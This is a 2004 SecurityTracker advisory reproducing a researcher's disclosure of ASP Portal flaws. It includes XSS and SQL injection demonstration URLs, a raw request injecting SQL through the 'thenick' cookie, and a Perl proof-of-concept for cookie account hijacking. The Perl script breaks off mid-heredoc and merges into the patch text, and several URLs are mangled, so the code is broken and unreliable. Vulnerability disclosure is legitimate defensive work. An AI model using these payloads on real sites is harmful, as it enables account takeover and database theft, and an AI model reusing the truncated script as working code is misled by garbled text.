Sign Up

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category:

Application (Forum/Board/Portal)>

ASP Portal

Vendors:

ASP Portal

ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID:1009050

SecurityTracker URL:http://http://www.zjjv.com///id/1009050

CVE Reference:

GENERIC-MAP-NOMATCH

(Links to External Site)

Date:Feb 14 2004

Impact:

Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Fix Available:YesVendor Confirmed:YesExploit Included:Yes

Description:

Manuel Lopez reported several vulnerabilities in ASP Portal. A remote user can inject SQL commands and can hijack user accounts. A remote user can also conduct cross-site scripting attacks.

It is reported that a remote user can modify the value of their 'thenick' cookie to obtain access to a target user's account, including an administrator's account. A demonstration account hijacking exploit is available in the Source Message.

The report also indicates that the 'index.asp' script does not properly validate user-supplied input in the 'pageid' and 'downloadscat' variables. A remote user can reportedly inject SQL commands to be executed by the database. Some demonstration exploit URLs are provided:

http://[target]/index.asp?inc=blog&pageid='[SqlQuery]

http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

It is also reported that a remote user can inject SQL commands via the 'thenick' cookie.

It is also reported that the software does not filter HTML code from user-supplied input before displaying information containing that input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/index.asp?inc='>[XSS]

http://[target]/index.asp?inc=profile&searchtext='>[XSS]

http://[target]/index.asp?inc=forumread&article='>[XSS]

It is also reported that a remote user with an account on the system can conduct cross-site scripting attacks by injecting HTML code in place of the image URL ('photograph URL') on the 'details' page.

Impact:

A remote user can hijack a target user's account.

A remote user can inject SQL commands to be executed by the database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:

The vendor has reportedly issued a fixed version.

Also, the January patch is available at:

http://http://www.zjjv.com///downloadsviewer.asp?theurl=38

Vendor URL:http://www.zjjv.com// (Links to External Site)

Cause:

Authentication error, Input validation error

Underlying OS:

Windows (Any)

Message History:

None.

Date: Sat, 14 Feb 2004 06:21:11 +0100

Subject: ASP Portal Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: ASP Portal Multiple Vulnerabilities
By: Manuel Lpez
Software: Asp Portal
Vendor Description:
ASP Portal is a an ASP powered portal site which uses an Access database to
store all the site info. The
script also includes and easy to use Admin Interface, so you can change
everything you need to online,
which makes maintaing the site very easy.
Severity:
Moderately critical
Impact:
Disclosure of authentication information, Disclosure of user information,
Execution of arbitrary code via
network, Modification of user information, ID Spoofing.
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Description:
---- Cross-Site Scripting ----
This product is vulnerable to the Cross-Site Scripting vulnerability that
would allow attackers to inject
HTML and script codes into the pages and execute it on the client's browser.
http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]
---- Image ScriptCode Injection ----
An attacker can inject arbitrary HTML or scriptcode instead of an Image in
"photograph URL" of user's
'details' page.
javascript:alert()
---- Sql Injection ----
Another problem of sanitation could lead an attacker to inject SQL code to
manipulate and disclose
various information from the database. The problem is in the fields 'pageid'
and 'downloadscat'.
http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
Also it is possible an Sql Injection in the cookie, in 'thenick' field.
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]
---- Cookie Account Hijack ----
It is possible to impersonate others by manipulating the 'thenick' parameter
in the cookie.
Modifying the cookie is possible to gain access to other account. This issue
can be exploited to gain an
administrative account with the service.
---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----
#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm
use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print " ____________________________________________________________ \n";
print "|                                                            |\n";
print "|   PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
print "|   Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "|                                                            |\n";
print "|   By: Manuel Lpez #IST                                    |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];
print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://http://www.zjjv.com///downloadsviewer.asp?theurl=38 or buy the new
version.
---- Credits ----
Manuel Lpez ( mantra@gulo.org ) #IST
Special Thanks: -- Aklis -- gulo.org
Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST
staff.
Excuse me for speaking English so badly.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1
iD8DBQFALavflZD3/ZFHM4ERApRSAJ46rZRn3OlSXp/k2jXwCXT0S0RLywCgn08e
mx+V1tKxAMSzt7PTgVh2D2A=
=0oiR
-----END PGP SIGNATURE-----